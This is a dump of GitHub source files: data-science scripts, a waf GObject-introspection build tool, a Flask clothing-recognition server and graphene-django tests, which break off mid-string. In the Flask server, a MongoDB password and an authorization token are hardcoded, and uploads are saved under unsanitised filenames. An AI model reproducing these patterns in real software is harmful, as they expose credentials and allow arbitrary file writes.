for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList4.append(emptyList)\n\n\nanotherList = list()\n\n\ndef step3group1():\n for list1 in listOfList:\n if len(list1) > 10:\n labels = util.cluster_user_data(list1)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list1, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\ndef step3group2():\n for list2 in listOfList2:\n if len(list2) > 10:\n labels = util.cluster_user_data(list2)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list2, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\ndef step3group3():\n for list3 in listOfList3:\n if len(list3) > 10:\n labels = util.cluster_user_data(list3)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list3, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\ndef step3group4():\n for list4 in listOfList4:\n if len(list4) > 10:\n labels = util.cluster_user_data(list4)\n print(\"Predicted Labels Are: \", labels)\n\n split_result = util.split_user_data(list4, labels)\n print(\"Split original user data to: \")\n print(split_result)\n print(\"Split_result length is: \", len(split_result))\n\n\n# the data should be obtained from your db\n\nstoredatabase(db)\nstep1group1(db)\nstep1group2(db)\nstep3group4()\nstep3group3()\nstep3group2()\nprint(listOfList3)\n","repo_name":"younglane/CSCI4710_6710_Group17","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9673091335","text":"def fillUtil(res, curr, n):\n # if we have reached curr as 0, then that means that we have successfully\n # placed all numbers from 0 to n. So, we are finished\n if curr == 0: return True\n\n # iterate through all possible positions to place the current number\n for i in range(2*n - curr - 1):\n # if we haven't filled in the current spot, nor the corresponding spot\n # that is \"curr\" distance away (which it has to be because that is in\n # the definition of the problem, then try filling it in\n if res[i] == 0 and res[i + curr + 1] == 0:\n # fill in the empty spots with the current number\n res[i] = res[i + curr + 1] = curr\n\n # if it is possible to fill in these spots, then if we recurse\n # downwards, it will work all the way through. so, return True,\n # since we have found a valid placement strategy\n if fillUtil(res, curr-1, n): return True\n\n # if the above line didn't work, then that means that our current\n # placement of the numbers must not have been right. Thus, we should\n # continue to iterate through the rest of the possible positions.\n\n # we must now 0 out the current positions so that they can be used for\n # future iterations (note that because of the if statement on top, we\n # will never walk on the toes of a recursive call further up that wrote\n # some indices, because we only test out spots that have not yet been\n # written to.\n res[i] = res[i + curr + 1] = 0\n return False\n\ndef main():\n n = 7\n res = [0] * (2 * n)\n if fillUtil(res, n, n):\n print(res)\n else:\n print('impossible')\n\nmain()\n","repo_name":"bensenberner/ctci","sub_path":"strings_arrays/fillArraySpecificWay.py","file_name":"fillArraySpecificWay.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11029860194","text":"\"\"\"clean_data.py\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as sm\n\ndef clean_up_data():\n\tloansData = pd.read_csv('https://spark-public.s3.amazonaws.com/dataanalysis/loansData.csv')\n\tloansData.dropna(inplace=True)\n\n\t# remove '%' from Interest.Rate and Debt.To.Income.Ratio column\n\tloansData['Interest.Rate'] = loansData['Interest.Rate'].map(lambda x: round(float(x.rstrip('%')) / 100, 4))\n\tloansData['Debt.To.Income.Ratio'] = loansData['Debt.To.Income.Ratio'].map(lambda x: round(float(x.rstrip('%')) / 100, 4))\n\n\t# remove ' months' from Loan.Length column\n\tloansData['Loan.Length'] = loansData['Loan.Length'].map(lambda x: int(x.rstrip(' months')))\n\n\t# convert FICO scores into a numerical value, and save it in a new column titled 'FICO.Score'\n\tloansData['FICO.Score'] = loansData['FICO.Range'].map(lambda x: (float(x.split('-')[0])))\n\n\t# confirm values are in float or int format instead of strings\n\tloansData['Interest.Rate'] = loansData['Interest.Rate'].map(lambda x: float(x))\n\tloansData['Amount.Requested'] = loansData['Amount.Requested'].map(lambda x: int(x))\n\n\treturn loansData","repo_name":"eddiejew/thinkfulprojects","sub_path":"Unit2/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12775089152","text":"import numpy as np\nfrom typing import Dict, Any\nfrom tqdm import tqdm\nfrom openmodelica_microgrid_gym.agents.episodic import EpisodicLearnerAgent\nfrom openmodelica_microgrid_gym.env import ModelicaEnv\n\n\nclass MonteCarloRunner:\n \"\"\"\n This class will execute an agent on the environment.\n It handles communication between agent and environment and handles the execution of multiple epochs\n Additionally to runner, the Monte-Carlo runner has an additional loop to perform n_MC experiments using one\n (controller) parameter set before update the (controller) parameters.\n Therefore, the agent.observe function is used.\n Inside the MC-loop the observe function is called with terminated = False to only update the return.\n The return is stored in an array at the end of the MC-loop.\n After finishing the MC-loop, the average of the return-array is used to update the (controller) parameters.\n Therefore, the agent-observe function is called with terminated = True\n \"\"\"\n\n def __init__(self, agent: EpisodicLearnerAgent, env: ModelicaEnv):\n \"\"\"\n\n :param agent: Agent that acts on the environment\n :param env: Environment tha Agent acts on\n \"\"\"\n self.env = env\n self.agent = agent\n self.agent.env = env\n self.run_data = dict() # type: Dict[str,Any]\n \"\"\"\n Dictionary storing information about the experiment.\n\n - \"best_env_plt\": environment best plots\n - \"best_episode_idx\": index of best episode\n - \"agent_plt\": last agent plot\n \"\"\"\n\n def run(self, n_episodes: int = 10, n_mc: int = 5, visualise: bool = False, prepare_mc_experiment=lambda: True,\n return_gradient_extend: bool = False):\n \"\"\"\n Trains/executes the agent on the environment for a number of epochs\n\n :param n_episodes: number of epochs to play\n :param n_mc: number of Monte-Carlo experiments using the same parameter set before updating the latter\n :param visualise: turns on visualization of the environment\n :param prepare_mc_experiment: prepares experiment by resetting stochastic components\n :param return_gradient_extend: calculates gradient extension for return if return_gradient_extend\n \"\"\"\n t = np.linspace(0, self.env.max_episode_steps * self.env.net.ts, self.env.max_episode_steps + 1)\n self.agent.reset()\n self.env.history.cols = self.env.history.structured_cols(None) + self.agent.measurement_cols\n self.agent.obs_varnames = self.env.history.cols\n self.env.measure = self.agent.measure\n\n initial_performance_mc = np.zeros(n_mc)\n performance_mc = np.zeros(n_mc)\n\n if not visualise:\n self.env.viz_mode = None\n agent_fig = None\n\n for i in tqdm(range(n_episodes), desc='episodes', unit='epoch'):\n done, r = False, None\n np.random.seed(0)\n for m in tqdm(range(n_mc), desc='monte_carlo_run', unit='epoch', leave=False):\n prepare_mc_experiment() # reset stoch components\n\n r_vec = np.zeros(self.env.max_episode_steps)\n\n obs = self.env.reset()\n\n for p in tqdm(range(self.env.max_episode_steps), desc='steps', unit='step', leave=False):\n self.agent.observe(r, False)\n act = self.agent.act(obs)\n obs, r, done, info = self.env.step(act)\n r_vec[p] = r\n self.env.render()\n if done:\n self.agent.observe(r, False)\n\n if return_gradient_extend:\n w = self.env.history['master.CVVd'].values\n w1 = self.env.history['master.CVVq'].values\n w2 = self.env.history['master.CVV0'].values\n v = self.env.history['master.SPVd'].values\n\n SP_sattle = (abs(w - v) < v * 0.12).astype(int) # 0.12 -> +-20V setpoint\n\n dw = np.gradient(w)\n dw1 = np.gradient(w1)\n dw2 = np.gradient(w2)\n\n dev_return = (np.mean(abs(SP_sattle * dw)) + np.mean(abs(SP_sattle * dw1)) + np.mean(\n abs(SP_sattle * dw2)))\n else:\n dev_return = 0\n print('NO DEV RETURN!!!!')\n\n dev_fac = 5 # 3\n\n print(self.agent.episode_return)\n print(dev_return)\n\n self.agent.performance = ((\n self.agent.episode_return - dev_return * dev_fac) - self.agent.min_performance) \\\n / (self.agent.initial_performance - self.agent.min_performance)\n\n if m == 0 and i == 0:\n self.agent.initial_performance = self.agent.episode_return - dev_return * dev_fac\n self.agent.performance = ((\n self.agent.episode_return - dev_return * dev_fac) - self.agent.min_performance) \\\n / (\n self.agent.initial_performance - self.agent.min_performance) # instead of perf/initial_perf\n self.agent.last_best_performance = self.agent.performance\n self.agent.last_worst_performance = self.agent.performance\n\n self.agent.best_episode = self.agent.history.df.shape[0]\n self.agent.last_best_performance = self.agent.performance\n self.agent.worst_episode = self.agent.history.df.shape[0]\n self.agent.last_worst_performance = self.agent.performance\n\n self.agent.performance = ((\n self.agent.episode_return - dev_return * dev_fac) - self.agent.min_performance) \\\n / (self.agent.initial_performance - self.agent.min_performance)\n\n performance_mc[m] = self.agent.performance\n initial_performance_mc[m] = self.agent.episode_return\n # set iterations and episode return = 0\n self.agent.prepare_episode()\n\n break\n\n _, env_fig = self.env.close()\n\n # vor break?\n if (m == 0 and i == 0): # and self.agent.has_improved:\n self.run_data['best_env_plt'] = env_fig\n self.run_data['best_episode_idx'] = i\n self.agent.last_best_performance = self.agent.performance\n\n if (m == 0 and i == 0): # and self.agent.has_worsened:\n self.run_data['worst_env_plt'] = env_fig\n self.run_data['worst_episode_idx'] = i\n self.agent.last_worst_performance = self.agent.performance\n\n if i == 0:\n # performance was normalized to first run -> use average of first episode so that J_initial for first\n # is 1\n eps_ret = performance_mc * (\n self.agent.initial_performance - self.agent.min_performance) + self.agent.min_performance\n self.agent.initial_performance = np.mean(eps_ret)\n performance_mc = (eps_ret - self.agent.min_performance) \\\n / (self.agent.initial_performance - self.agent.min_performance)\n\n self.agent.performance = np.mean(performance_mc)\n self.agent.update_params()\n\n if visualise:\n agent_fig = self.agent.render()\n\n self.run_data['last_agent_plt'] = agent_fig\n","repo_name":"upb-lea/openmodelica-microgrid-gym","sub_path":"experiments/model_validation/execution/monte_carlo_runner.py","file_name":"monte_carlo_runner.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"77"} +{"seq_id":"3209473323","text":"#!/usr/bin/python\n\n\"\"\"\nCreate and install GObject Introspection data.\n\nThe functions herein center around a feature called 'gir' which scans source\nfiles for GObject Introspection data and compiles a Typelib. It and all\nmandatory parameters can simply be added to a generator creating a shared\nlibrary from c sources or used to create a separate task generator that\nreferences the target library.\n\n def options(opt):\n opt.load(\"gir\")\n\n def configure(cnf):\n cnf.load(\"gir\")\n cnf.check_gir(\"GLib-2.0\",\n store=\"GLIB\") # defaults to upper cased package name\n\n def build(bld):\n bld(features=\"c cshlib gir\",\n source=\"object.c\", # main code to be compiled\n target=\"object\",\n scan=\"object.h\", # header files for the g-ir-scanner\n include=\"GLIB\", # GIR repositories to depend upon\n namespace=\"Object\", # by default capitalized first header name\n version=1) # defaults to 0\n\nor\n\n bld(features=\"c cshlib\", # library compilation\n source=\"object.c\", target=\"object\", use=\"GLIB2\")\n bld(features=\"gir\",\n lib=\"object\", # library to introspect\n scan=\"object.h\") # header files to scan\n\nIf the scan parameter is left out, one header is assumed with the same base\nname as the library. The lib parameter can be left out when the task generator\nalready builds a library to use or the basename of the first header in a\npresent scan parameter designates the library name.\n\nOther GIR repositories to depend upon are configured similar to the check_cfg\nfunction known from c projects. The underlying libraries will automatically be\nchecked, too, and added to the uselib parameter of any generator that utilizes\na GIR include parameter.\n\nInstallation paths and the location to lookup GIR XML descriptions can be\nconfigured as known from the gnu_dirs package. To do so, the gir tool has to be\nloaded also in the options function.\n\"\"\"\n\nfrom waflib.TaskGen import feature, before_method, after_method\nfrom waflib.Task import Task\nfrom waflib.Errors import WafError\nfrom waflib.Configure import conf\nfrom waflib.Utils import subst_vars\nfrom operator import methodcaller\nfrom os.path import join\nfrom xml.etree.ElementTree import fromstring\n\ndef options(opt):\n opt.load('gnu_dirs')\n\n group = opt.get_option_group(\"Installation directories\")\n group.add_option(\"--girdir\",\n help=\"GIR XML repository [DATAROOTDIR/gir-1.0]\")\n group.add_option(\"--typelibdir\",\n help=\"compiled GIR typelibs [LIBDIR/girepository-1.0]\")\n\n group = opt.get_option_group(\"Configuration options\")\n group.add_option(\"--girsearchpath\",\n help=\"path to lookup GIR repository XML [GIRDIR]\")\n\nGIR_NAMESPACE = '{http://www.gtk.org/introspection/core/1.0}'\n\n@conf\ndef check_gir(cnf, gir, store=None):\n cnf.start_msg(f\"Checking for GIR XML {gir}\")\n girpath = getattr(cnf, 'girpath', None)\n if not girpath:\n girpath = cnf.girpath = cnf.root.find_node(cnf.env.GIRSEARCHPATH)\n env = cnf.env\n\n if not store:\n store = gir.upper()\n\n f = cnf.girpath.find_resource(gir + '.gir')\n if not f:\n cnf.end_msg(\"not found\", 'YELLOW')\n cnf.fatal('The configuration failed')\n env.append_value(f'GIRINC_{store}', (gir, ))\n xml = fromstring(f.read())\n packages = tuple(include.get('name') for include\n in xml.iterfind(GIR_NAMESPACE + 'package'))\n env.append_value(f'GIRUSE_{store}',\n map(methodcaller('upper'), packages))\n recursive = xml.findall(GIR_NAMESPACE + 'include')\n cnf.end_msg(f.abspath())\n\n for package in packages:\n cnf.check_cfg(package=package, args='--cflags --libs')\n for recurse in recursive:\n cnf.check_gir('{name}-{version}'.format(**recurse.attrib))\n\ndef configure(cnf):\n cnf.find_program(\"g-ir-scanner\")\n cnf.find_program(\"g-ir-compiler\")\n env = cnf.env\n env.GIRLIB_T = '-l%s' # template passing library to scanner\n env.GIRPATH_T = '-L%s' # template passing library search path\n env.GIRINC_T = '--include=%s' # template including other GIR repositories\n cnf.env.append_value(\"GIRSCANNERFLAGS\", \"--warn-all\")\n\n cnf.load('gnu_dirs')\n env.GIRDIR = subst_vars(cnf.options.girdir or\n join(\"${DATAROOTDIR}\", \"gir-1.0\"), env)\n env.TYPELIBDIR = subst_vars(cnf.options.typelibdir or\n join(\"${LIBDIR}\", \"girepository-1.0\"), env)\n env.GIRSEARCHPATH = subst_vars(cnf.options.typelibdir or \"${GIRDIR}\", env)\n\nclass gir(Task):\n run_str = \"${G_IR_SCANNER} --no-libtool ${GIRSCANNERFLAGS} \" \\\n \"${GIRLIB_T:GIRLIB} ${GIRPATH_T:GIRPATH} ${GIRINC_T:GIRINC} \" \\\n \"--namespace=${NAMESPACE} --nsversion=${VERSION} \" \\\n \"--output ${TGT} ${SRC}\"\n\n @staticmethod\n def keyword():\n return \"Scanning\"\n\nclass gircompile(Task):\n run_str = \"${G_IR_COMPILER} -o ${TGT} ${SRC}\"\n\n@feature(\"gir\")\n@after_method('apply_link')\n@before_method('process_use')\ndef process_gir(gen):\n scan = gen.to_nodes(getattr(gen, \"scan\", []))\n\n lib = getattr(gen, \"lib\", None)\n if lib:\n lib_gen = gen.bld.get_tgen_by_name(gen.lib)\n lib_task = lib_gen.link_task\n else:\n lib_task = getattr(gen, 'link_task', None)\n if lib_task:\n lib_gen = gen\n else:\n try:\n lib_gen = gen.bld.get_tgen_by_name(\n scan[0].name.rpartition('.')[0])\n except IndexError:\n raise WafError(f\"{gen} lacks a library to introspect \"\n \"and does not build one itself\")\n lib_task = lib_gen.link_task\n\n if not scan:\n scan = gen.to_nodes([f\"{lib_gen.target}.h\"])\n namespace = getattr(gen, \"namespace\", None) or \\\n ''.join(map(methodcaller('capitalize'), scan[0].name[:-2].split('_')))\n version = str(getattr(gen, \"version\", 0))\n gir = gen.path.find_or_declare(f\"{namespace}-{version}.gir\")\n\n scan_task = gen.create_task('gir', tgt=gir, src=scan)\n env = scan_task.env\n env.NAMESPACE = namespace\n env.VERSION = version\n\n env.append_value('GIRLIB', [lib_gen.target])\n scan_task.dep_nodes.extend(lib_task.outputs)\n env.append_unique('GIRPATH', [\n lib_task.outputs[0].parent.path_from(gen.path)])\n\n for include in gen.to_list(getattr(gen, \"include\", [])):\n env.append_value('GIRINC', env[f'GIRINC_{include}'])\n\n gen.add_install_files(install_to=env.GIRDIR,\n install_from=scan_task.outputs)\n gen.add_install_files(install_to=env.TYPELIBDIR,\n install_from=gen.create_task('gircompile', gir,\n gir.change_ext('.typelib')).outputs)\n\n try:\n use = gen.to_list(gen.use)\n except AttributeError:\n use = gen.use = []\n for include in gen.to_list(getattr(gen, \"include\", [])):\n use.extend(gen.env[f'GIRUSE_{include}'])\n","repo_name":"dffischer/waf-gobject-introspection","sub_path":"gir.py","file_name":"gir.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11742554129","text":"# USAGE\n# Start the server:\n# \tpython flask_deploy.py\n# Submit a request via cURL:\n# \tcurl -X POST -F image=@dog.jpg 'http://0.0.0.0:5000/predict'\n\n# import the necessary packages\nfrom keras.preprocessing.image import img_to_array, load_img\nfrom keras.models import load_model\nfrom bson.objectid import ObjectId\nfrom PIL import Image\nimport numpy as np\nimport pickle, cv2, os, io, flask, pymongo, random\t\n\n\napp = flask.Flask(__name__)\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\napp.config['IMAGE_UPLOADS'] = os.path.join(APP_ROOT, 'uploads')\nmodel_cat = None\nmodel_sty = None\nmodel_rec = None\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n\t# ensure an image was properly uploaded to our endpoint\n\tres={}\n\tresult_5={}\n\tres[\"feedback\"] = []\n\tif flask.request.method == \"POST\":\n\t\tif (flask.request.headers.get(\"Authorization\") == \"Basic YWxhZGRpbjpvcGVuc2VzYW1lljrhebgervwekbflisufbewyufewfsngsdbgrrldngsufigbeurgb\"):\n\t\t\tif flask.request.files.get(\"image\"):\n\t\t\t\t\n\t\t\t\tresult_5['item'] = []\n\t\t\t\tresult_5['tags'] = []\n\t\t\t\tres[\"predictions\"] = []\n\t\t\t\t# read the image in PIL format\t\n\t\t\t\timage = flask.request.files[\"image\"]\n\t\t\t\tfilename = image.filename\n\t\t\t\tfile_path = os.path.join(app.config[\"IMAGE_UPLOADS\"], filename)\n\t\t\t\timage_pil = Image.open(image)\n\t\t\t\timage_pil.save(file_path)\n\t\t\t\timage = load_img(file_path, target_size=(96,96))\n\t\t\t\timage = cv2.imread(file_path)\n\t\t\t\timage = cv2.resize(image, (96, 96))\n\t\t\t\timage = image.astype(\"float\") / 255.0\n\t\t\t\timage = img_to_array(image)\n\t\t\t\timage = np.expand_dims(image, axis=0)\n\n\t\t\t\t# classify the input image then find the indexes of the two class\n\t\t\t\t# labels with the *largest* probability\n\t\t\t\tprint(\"[INFO] classifying image...\")\n\t\t\t\tproba_cat = model_cat.predict(image)[0]\n\t\t\t\tidxs_cat = np.argsort(proba_cat)[::-1][:2] # return 2 results from categories model\n\t\t\t\tproba_sty = model_sty.predict(image)[0]\n\t\t\t\tidxs_sty = np.argsort(proba_sty)[::-1][:4] # return 4 results from styles model\n\t\t\t\tproba_rec = model_rec.predict(image)[0]\n\t\t\t\tidxs_rec = np.argsort(proba_rec)[::-1][:1] # return 2 results from categories model\n\n\n\t\t\t\t# loop over the indexes of the high confidence class labels\n\t\t\t\tfor (i, j) in enumerate(idxs_rec):\n\t\t\t\t\t# build the label and draw the label on the image\n\t\t\t\t\t# result_5.append(\"{}: {:.2f}%\".format(mlb_cat.classes_[j], proba_cat[j] * 100))\n\t\t\t\t\tif(mlb_rec.classes_[j] == 't-shirts'):\n\t\t\t\t\t\tresult_5['item'] = 't_shirts'\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult_5['item'] = mlb_rec.classes_[j]\n\n\n\t\t\t\t# loop over the indexes of the high confidence class labels\n\t\t\t\tfor (i, j) in enumerate(idxs_cat):\n\t\t\t\t\t# build the label and draw the label on the image\n\t\t\t\t\t# result_5.append(\"{}: {:.2f}%\".format(mlb_cat.classes_[j], proba_cat[j] * 100))\n\t\t\t\t\tresult_5['tags'].append(mlb_cat.classes_[j])\n\t\t\t\t\t# r = {\"label\": \"{}\".format(mlb_cat.classes_[j]), \"probability\": \"{:.2f}\".format(proba_cat[j] * 100)}\n\t\t\t\t\t# res[\"predictions\"].append(r)\n\t\t\t\t# loop over the indexes of the high confidence class labels\n\t\t\t\tfor (i, j) in enumerate(idxs_sty):\n\t\t\t\t\t# build the label and draw the label on the image\n\t\t\t\t\t# result_5.append(\"{}: {:.2f}%\".format(mlb_sty.classes_[j], proba_sty[j] * 100))\n\t\t\t\t\tresult_5['tags'].append(mlb_sty.classes_[j])\n\t\t\t\t\t# r = {\"label\": \"{}\".format(mlb_sty.classes_[j]), \"probability\": \"{:.2f}\".format(proba_sty[j] * 100)}\n\t\t\t\t\t# res[\"predictions\"].append(r)\n\t\t\telse:\n\t\t\t\tres['feedback'].append(\"Flask doesn't get image\")\n\t\telse:\n\t\t\tres['feedback'].append(\"Authorization token is wrong\")\n\telse: \n\t\tres['feedback'].append(\"Request isn`t POST\")\n\n\t# return the data dictionary as a JSON response\n\tprint(result_5)\n\treturn flask.jsonify(result_5)\n\t# return flask.jsonify(res)\n\n\n@app.route(\"/recommend\", methods=[\"POST\"])\ndef recommend():\n\t# ensure an image was properly uploaded to our endpoint\n\tres={}\n\tres[\"feedback\"] = []\n\tif flask.request.method == \"POST\":\n\t\tif (flask.request.headers.get(\"Authorization\") == \"Basic YWxhZGRpbjpvcGVuc2VzYW1lljrhebgervwekbflisufbewyufewfsngsdbgrrldngsufigbeurgb\"):\n\t\t\titemTags = []\n\t\t\trecommended_items = {}\n\t\t\titem = ''\n\t\t\tlook = {}\n\n\t\t\tdatabaseName = flask.request.headers.get(\"DbName\")\n\t\t\tcollectionName = flask.request.headers.get(\"CollName\")\n\t\t\tInputImageID = flask.request.headers.get(\"InputImageID\")\n\n\t\t\tprint('JSON body', flask.request.get_json())\n\t\t\tif(flask.request.get_json()):\n\t\t\t\tFromBody=flask.request.get_json()\n\t\t\t\tprint(FromBody)\n\t\t\t\titem = FromBody['item']\n\t\t\t\titemTags = FromBody['tags']\n\n\t\t\t# Connect to DataBase\n\t\t\tclient = pymongo.MongoClient(\"mongodb+srv://user:fqg78pXPCpt8dtk@cluster0.xzh33.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\")\n\t\t\t# Database Name \n\t\t\tdb = client[databaseName] \n\t\t\t# Collection Name \n\t\t\tcollection = db[collectionName]\n\n\t\t\tobj_id_to_find = ObjectId(InputImageID)\n\t\t\tx = collection.find({\"_id\": obj_id_to_find}) \n\n\t\t\tfor data in x:\n\t\t\t\titem = data['item']\n\t\t\t\titemTags = data['tags']\n\t\t\t\n\t\t\tif(databaseName == 'images' and InputImageID == 'filters'):\n\t\t\t\tlook1 = {'shoes': 10, 'dresses': 10, 'hats': 10, 'coats': 10, 'pants': 10, 'shorts': 10, 'sweaters': 10, 't_shirts': 10, 'bags': 10 }\n\t\t\telse:\n\t\t\t\tlook1 = {'shoes': 0, 'dresses': 0, 'hats': 0, 'coats': 0, 'pants': 0, 'shorts': 0, 'sweaters': 0, 't_shirts': 0, 'bags': 0 }\n\n\t\t\tneededItems={}\n\n\t\t\tfor clothElement, similarity in look1.items():\n\t\t\t\tneededItems[clothElement] = []\n\t\t\t\tx = collection.find({'item': clothElement})\n\t\t\t\tfor data in x:\n\t\t\t\t\titemID = data['_id']\n\t\t\t\t\tgetTags = data['tags']\n\t\t\t\t\tres = format((len(set(itemTags) & set(getTags)) / float(len(set(itemTags) | set(getTags))) * 100), \".0f\")\n\t\t\t\t\t# print(\"Similarity is = \" + str(res) + ' | ' + str(itemTags) + ' | ' + str(getTags))\n\t\t\t\t\tif(int(res) >= similarity):\n\t\t\t\t\t\tneededItems[clothElement].append(itemID)\n\t\t\t\n\t\t\tcreate_looks_from_single_item(neededItems, look, item, collection, InputImageID)\n\t\telse:\n\t\t\tres['feedback'].append(\"Authorization token is wrong\")\n\t\t\n\telse: \n\t\tres['feedback'].append(\"Request isn`t POST\")\n\n\t# return the data dictionary as a JSON response\n\tprint(look)\n\treturn flask.jsonify(look)\n\t\ndef create_looks_from_single_item(neededItems, look, item, collection, InputImageID):\n\tshoes = {'look1': [\"pants\", \"t_shirts\"], 'look2': [\"pants\", \"sweaters\"], 'look3': [\"shorts\", \"t_shirts\", \"hats\"]}\n\tdresses = {'look1': [\"shoes\", \"bags\"], 'look2': [\"shoes\", \"bags\"], 'look3': [\"shoes\", \"coats\"]}\n\tcoats = {'look1': [\"shoes\", \"pants\", \"sweaters\"], 'look2': [\"shoes\", \"pants\", \"t_shirts\"], 'look3': [\"shoes\", \"pants\", \"sweaters\"]}\n\tpants = {'look1': [\"shoes\", \"t_shirts\"], 'look2': [\"shoes\", \"sweaters\"], 'look3': [\"shoes\", \"sweaters\", \"coats\"]}\n\tshorts = {'look1': [\"shoes\", \"t_shirts\"], 'look2': [\"shoes\", \"t_shirts\"], 'look3': [\"shoes\", \"t_shirts\"]}\n\tsweaters = {'look1': [\"shoes\", \"pants\"], 'look2': [\"shoes\", \"pants\"], 'look3': [\"shoes\", \"pants\", \"coats\"]}\n\tt_shirts = {'look1': [\"shoes\", \"pants\"], 'look2': [\"shoes\", \"pants\"], 'look3': [\"shoes\", \"shorts\"]}\n\n\tif(item==\"shoes\"):\n\t\tgenerate_random_look(shoes, neededItems, look, collection, InputImageID)\n\tif(item==\"dresses\"):\n\t\tgenerate_random_look(dresses, neededItems, look, collection, InputImageID)\n\tif(item==\"coats\"):\n\t\tgenerate_random_look(coats, neededItems, look, collection, InputImageID)\n\tif(item==\"pants\"):\n\t\tgenerate_random_look(pants, neededItems, look, collection, InputImageID)\n\tif(item==\"shorts\"):\n\t\tgenerate_random_look(shorts, neededItems, look, collection, InputImageID)\n\tif(item==\"t_shirts\"):\n\t\tgenerate_random_look(t_shirts, neededItems, look, collection, InputImageID)\n\tif(item==\"sweaters\"):\n\t\tgenerate_random_look(sweaters, neededItems, look, collection, InputImageID)\n\n\t# if(item==\"skirts\"):\n\t# generate_random_look(shoes, neededItems, look, collection, InputImageID)\n\treturn(look)\n\t\n\t\ndef generate_random_look(item, neededItems, look, collection, InputImageID):\n\tfor k,v in item.items():\n\t\tlook[k] = []\n\t\tlook[k].append(InputImageID)\n\t\tfor s in v:\n\t\t\tif(neededItems[s]==[]):\n\t\t\t\tlook[k].append(\"Items doesn't fit!\")\n\t\t\telse:\n\t\t\t\trand_choice = random.choice(neededItems[s])\n\t\t\t\tlook[k].append(str(rand_choice))\n\n\n@app.route(\"/\")\ndef start():\n\treturn \"Hello, server works properly! \\n Have a nice day)\"\n\n\ndef load_models():\n\tglobal model_cat\n\tmodel_cat = load_model(APP_ROOT+\"/models/categories_40_epochs.model\")\n\tglobal mlb_cat\n\tmlb_cat = pickle.loads(open(APP_ROOT+\"/models/categories_40_epochs.pickle\", \"rb\").read())\n\tglobal model_sty\n\tmodel_sty = load_model(APP_ROOT+\"/models/styles_40_epochs.model\")\n\tglobal mlb_sty\n\tmlb_sty = pickle.loads(open(APP_ROOT+\"/models/styles_40_epochs.pickle\", \"rb\").read())\n\tglobal model_rec\n\tmodel_rec = load_model(APP_ROOT+\"/models/cloth_recognition.model\")\n\tglobal mlb_rec\n\tmlb_rec = pickle.loads(open(APP_ROOT+\"/models/cloth_recognition.pickle\", \"rb\").read())\n\tprint(\"Models loaded successfully!\")\n\n\nif __name__ == \"__main__\":\n\tprint((\"* Loading Keras model and Flask starting server...\"\n\t\t\"please wait until server has fully started\"))\n\tload_models()\n\tapp.run(host='0.0.0.0', threaded=False, debug=False)\n\n","repo_name":"GreenApple131/eleks-practice","sub_path":"recognize_outfit/flask_model/flask_deploy.py","file_name":"flask_deploy.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17027451872","text":"import datetime\n\nimport pytest\nfrom django.db import models\nfrom py.test import raises\n\nimport graphene\nfrom graphene import relay\n\nfrom ..compat import MissingType, RangeField\nfrom ..types import DjangoNode, DjangoObjectType\nfrom .models import Article, Reporter\n\npytestmark = pytest.mark.django_db\n\n\ndef test_should_query_only_fields():\n with raises(Exception):\n class ReporterType(DjangoObjectType):\n\n class Meta:\n model = Reporter\n only_fields = ('articles', )\n\n schema = graphene.Schema(query=ReporterType)\n query = '''\n query ReporterQuery {\n articles\n }\n '''\n result = schema.execute(query)\n assert not result.errors\n\n\ndef test_should_query_well():\n class ReporterType(DjangoObjectType):\n\n class Meta:\n model = Reporter\n\n class Query(graphene.ObjectType):\n reporter = graphene.Field(ReporterType)\n\n def resolve_reporter(self, *args, **kwargs):\n return ReporterType(Reporter(first_name='ABA', last_name='X'))\n\n query = '''\n query ReporterQuery {\n reporter {\n firstName,\n lastName,\n email\n }\n }\n '''\n expected = {\n 'reporter': {\n 'firstName': 'ABA',\n 'lastName': 'X',\n 'email': ''\n }\n }\n schema = graphene.Schema(query=Query)\n result = schema.execute(query)\n assert not result.errors\n assert result.data == expected\n\n\n@pytest.mark.skipif(RangeField is MissingType,\n reason=\"RangeField should exist\")\ndef test_should_query_postgres_fields():\n from django.contrib.postgres.fields import IntegerRangeField, ArrayField, JSONField, HStoreField\n\n class Event(models.Model):\n ages = IntegerRangeField(help_text='The age ranges')\n data = JSONField(help_text='Data')\n store = HStoreField()\n tags = ArrayField(models.CharField(max_length=50))\n\n class EventType(DjangoObjectType):\n\n class Meta:\n model = Event\n\n class Query(graphene.ObjectType):\n event = graphene.Field(EventType)\n\n def resolve_event(self, *args, **kwargs):\n return Event(\n ages=(0, 10),\n data={'angry_babies': True},\n store={'h': 'store'},\n tags=['child', 'angry', 'babies']\n )\n\n schema = graphene.Schema(query=Query)\n query = '''\n query myQuery {\n event {\n ages\n tags\n data\n store\n }\n }\n '''\n expected = {\n 'event': {\n 'ages': [0, 10],\n 'tags': ['child', 'angry', 'babies'],\n 'data': '{\"angry_babies\": true}',\n 'store': '{\"h\": 